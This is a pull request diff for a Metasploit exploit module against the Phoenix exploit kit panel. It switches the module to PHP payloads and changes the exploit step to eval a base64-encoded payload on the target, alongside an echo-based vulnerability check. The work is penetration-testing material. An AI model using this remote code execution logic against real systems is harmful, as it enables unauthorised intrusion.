### PR TITLE
Convert phoenix_exec to ARCH_PHP

### DIFF
--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -32,21 +32,11 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]
         ],
       'Privileged'     => false,
-      'Payload'        =>
-        {
-          'Space'    => 200,
-          'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd'
-            }
-        },
-      'Platform'       => %w{ unix win },
-      'Arch'           => ARCH_CMD,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          [ 'Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
-          [ 'Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
+          [ 'Automatic', {} ]
         ],
       'DisclosureDate' => 'Jul 01 2016',
       'DefaultTarget'  => 0))
@@ -59,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     test = Rex::Text.rand_text_alpha(8)
-    res = http_send_command("echo #{test};")
+    res = http_send_command("echo \"#{test}\";")
     if res && res.body.include?(test)
       return Exploit::CheckCode::Vulnerable
     end
@@ -68,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     encoded = Rex::Text.encode_base64(payload.encoded)
-    http_send_command("passthru(base64_decode(\"#{encoded}\"));")
+    http_send_command("eval(base64_decode(\"#{encoded}\"));")
   end
 
   def http_send_command(cmd)


### PR DESCRIPTION
Updates `exploit/multi/http/phoenix_exec` to use `ARCH_PHP`.
- [x] Test with PHP payloads
- [x] They do what you want

Fixes #7220. cc @shipcod3 @wwebb-r7
